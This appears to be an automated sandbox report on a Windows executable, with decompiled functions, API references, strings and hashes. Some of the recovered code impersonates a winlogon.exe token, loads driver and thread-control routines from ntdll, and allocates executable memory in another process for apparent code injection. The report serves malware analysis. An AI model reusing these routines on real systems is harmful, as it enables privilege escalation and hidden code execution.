0x00401f38
0x00401f3f
0x00401f4e
0x00401f54
0x00401f5f
0x00401f6e
0x00401f72
0x00401f77
0x00401f78
0x00401f91
0x00401f7a
0x00401f88
0x00401f8e
0x00401f8e
0x00401fa6
0x00401fa9
0x00401fae
0x00401fb0
0x00401fb2
0x00401fb9
0x00401fc2
0x00401fca
0x00401fd2
0x00401fd2
0x00401fd7
0x00401fd7
0x00401fe3

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80
SeImpersonatePrivilege, xrefs: 00401FB4

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

GetProcessTimes, xrefs: 00409570
kernel32.dll, xrefs: 00409561

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fbd
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

0x00409ddc
0x00409de4
0x00409df0
0x00409df5
0x00409df6
0x00409e03
0x00409e05
0x00409e06
0x00409e3b
0x00409e5d
0x00409e6a
0x00409e73
0x00409e75
0x00409e08
0x00409e08
0x00409e19
0x00409e37
0x00409e37
0x00409e81

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x00404951
0x00404952
0x00404956
0x004049a1
0x00404958
0x00404959
0x0040495b
0x0040495b
0x0040495f
0x00404961
0x00404963
0x0040496d
0x00404975
0x00404977
0x0040497b
0x00404985
0x0040498a
0x0040498e
0x00404993
0x0040499d
0x0040499d

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00409EA9

Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

0x00408e38
0x00408e44
0x00408e56
0x00408e68
0x00408e7a
0x00408e8c
0x00408e9e
0x00408eb0
0x00408ec2
0x00408ed4
0x00408ee6
0x00408ef8
0x00408f0a
0x00408f1c
0x00408f21
0x00408f23
0x00000000
0x00408f28
0x00408f29

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtQueryInformationThread, xrefs: 00408EDB
NtOpenThread, xrefs: 00408EB7
NtLoadDriver, xrefs: 00408E5D
NtResumeThread, xrefs: 00408EFF
NtClose, xrefs: 00408EC9
NtSuspendThread, xrefs: 00408EED
NtUnloadDriver, xrefs: 00408E6F
NtQuerySymbolicLinkObject, xrefs: 00408E93
ntdll.dll, xrefs: 00408E3F
NtQueryObject, xrefs: 00408EA5
NtTerminateThread, xrefs: 00408F11
NtQuerySystemInformation, xrefs: 00408E50
NtOpenSymbolicLinkObject, xrefs: 00408E81

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
